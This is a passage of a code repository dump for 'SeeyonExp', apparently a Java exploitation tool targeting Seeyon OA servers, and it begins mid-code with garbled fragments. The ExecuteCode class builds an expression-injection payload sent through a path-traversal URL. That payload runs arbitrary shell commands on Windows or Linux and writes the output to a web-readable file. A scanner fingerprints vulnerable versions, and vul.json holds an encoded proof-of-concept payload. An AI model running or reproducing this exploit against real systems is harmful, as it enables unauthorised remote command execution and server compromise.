\"\";for (int i=0;i=0){ 16 | byteOut.write(buffer,0,n); 17 | } 18 | return byteOut.toString(); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /SeeyonExp/src/main/java/Encoder.java: -------------------------------------------------------------------------------- 1 | import java.io.ByteArrayOutputStream; 2 | import java.io.IOException; 3 | import java.net.URLEncoder; 4 | import java.util.zip.GZIPOutputStream; 5 | 6 | public class Encoder { 7 | 8 | public String Encoder(String encodeStr) throws IOException { 9 | ByteArrayOutputStream byteOut = new ByteArrayOutputStream(); 10 | GZIPOutputStream gzipOut = new GZIPOutputStream(byteOut); 11 | gzipOut.write(encodeStr.getBytes("UTF-8")); 12 | gzipOut.close(); 13 | gzipOut.flush(); 14 | String gzipEnStr = byteOut.toString("iso-8859-1"); 15 | return URLEncoder.encode(gzipEnStr,"UTF-8"); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /SeeyonExp/src/main/java/ExecuteCode.java: -------------------------------------------------------------------------------- 1 | import java.util.UUID; 2 | 3 | public class ExecuteCode { 4 | public void ExecuteCode(String oaUrl,String cmd) throws Exception { 5 | HTTPClient httpClient = new HTTPClient(); 6 | UUID uuid = UUID.randomUUID(); 7 | String uuidStr = uuid.toString(); 8 | uuidStr = uuidStr.replace("-", ""); 9 | String realUrl = oaUrl + "/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip"; 10 | String getUrl = oaUrl + "/" + uuidStr + ".txt"; 11 | String uuidTxt = "../webapps/seeyon/" + uuidStr + ".txt"; 12 | String winDel = "cd ../webapps/seeyon&del "+uuidStr+".txt"; 13 | String linuxDel = "cd ../webapps/seeyon;rm -f " +uuidStr+".txt"; 14 | //执行命令 15 | String execString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");Process pc = null;if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\"" + cmd + "\");pc =pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\"" + cmd + "\");pc = pb.start();};java.io.BufferedReader br = new java.io.BufferedReader(new InputStreamReader(pc.getInputStream(),\"GBK\"));String line = \"\";StringBuilder sb = new StringBuilder();while((line = br.readLine())!=null){sb.append(line+\"\\\\n\");};br.close();String sbStr = sb.toString();sun.misc.BASE64Encoder encoder=new sun.misc.BASE64Encoder();byte[] enByte = sbStr.getBytes(\"UTF-8\");String enStr = encoder.encode(enByte);char[] enChar = enStr.toCharArray();String Base65 = \"\";for (int i=0;i versionsList = versions.toList(); 26 | List versionList1 = new ArrayList<>(); 27 | for (Object version:versionsList) { 28 | versionList1.add((String)version); 29 | } 30 | if (url.startsWith("http:")){ 31 | HttpClient client = new DefaultHttpClient(); 32 | HttpGet request = new HttpGet(url); 33 | HttpResponse response = client.execute(request); 34 | String result = EntityUtils.toString(response.getEntity()); 35 | if (result != null){ 36 | Integer indexVersionFlag = result.lastIndexOf("all-min.css"); 37 | String version = result.substring(indexVersionFlag,indexVersionFlag+21); 38 | String[] versionArr = version.split("="); 39 | version = versionArr[1]; 40 | version = version.replace("_",".").toLowerCase(); 41 | for (String versionString : versionList1) { 42 | if (version.startsWith(versionString.toLowerCase())){ 43 | System.out.println("[*]命中影响版本，开始扫描"); 44 | String attackUrl=""; 45 | for (Object atturl:attUrl) { 46 | attackUrl = url + atturl; 47 | } 48 | Scanner scanner = new Scanner(); 49 | System.out.println(scanner.Scanner(poc,attackUrl,method,res)); 50 | } 51 | continue; 52 | } 53 | }else { 54 | System.out.println("[!]网页无内容，请检查后重新运行"); 55 | } 56 | }else { 57 | CloseableHttpClient client; 58 | URIBuilder uriBuilder = new URIBuilder(url); 59 | int port = uriBuilder.getPort(); 60 | if (port != 443){ 61 | client = new SSLClient(uriBuilder.getPort()); 62 | }else { 63 | client = new SSLClient(443); 64 | } 65 | HttpGet httpGet = new HttpGet(uriBuilder.build()); 66 | CloseableHttpResponse response = client.execute(httpGet); 67 | String result = EntityUtils.toString(response.getEntity()); 68 | if (result != null) { 69 | Integer indexVersionFlag = result.lastIndexOf("all-min.css"); 70 | String version = result.substring(indexVersionFlag,indexVersionFlag+21); 71 | String[] versionArr = version.split("="); 72 | version = versionArr[1]; 73 | version = version.replace("_",".").toLowerCase(); 74 | for (String versionString : versionList1) { 75 | if (version.startsWith(versionString.toLowerCase())){ 76 | System.out.println("[*]命中影响版本，开始扫描"); 77 | String attackUrl=""; 78 | for (Object atturl:attUrl) { 79 | attackUrl = url + atturl; 80 | } 81 | Scanner scanner = new Scanner(); 82 | System.out.println(scanner.Scanner(poc,attackUrl,method,res)); 83 | } 84 | continue; 85 | } 86 | }else { 87 | System.out.println("[!]网页无内容，请检查后重新运行"); 88 | } 89 | } 90 | } 91 | } 92 | -------------------------------------------------------------------------------- /SeeyonExp/vul.json: -------------------------------------------------------------------------------- 1 | { 2 | "Vulnerabilities": 3 | [ 4 | { 5 | "name": "Seeyon Expression injection", 6 | "ImpactVersion": ["V7.0","V7.1","V8.0","V6.1"], 7 | "url": ["/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip"], 8 | "pocMethod": "POST", 9 | "pocContent": "managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00%C2%8B%C2%AEVO%C3%8B%2F%C3%8A-%C3%8DI%0C%C2%A9%2CHU%C2%B7R0%C3%94Q%C2%80%C2%89%C3%B8%25%C3%A6%C2%82D%C3%94KR%C2%8BK%C3%94%11%C3%82%C2%AE%15%05E%C2%A9%C3%85%C3%85%C2%99%C3%B9y+%C3%89%C3%A0%C2%92%C2%A2%C3%8C%C2%BCt%C2%85%C2%82%C3%84%C2%92%0C%05%5B%05%25C%25%C3%ABZk%C2%90%06%0DM%C3%AB%C2%94%C3%944%C2%85%C3%A2%C2%92%C3%84%C2%92%C3%8Cd%C2%85%C2%8A%C2%8A%0A%0D%C3%8Dj%C3%B5Z%C2%A0%29%40%C2%93%C2%AAAtIQi%C2%AAz%2C%00l%C3%BA%C2%92%C3%AC%C2%80%00%00%00", 10 | "verify": "string", 11 | "Response": "\"message\":null", 12 | } 13 | ] 14 | } 15 | --------------------------------------------------------------------------------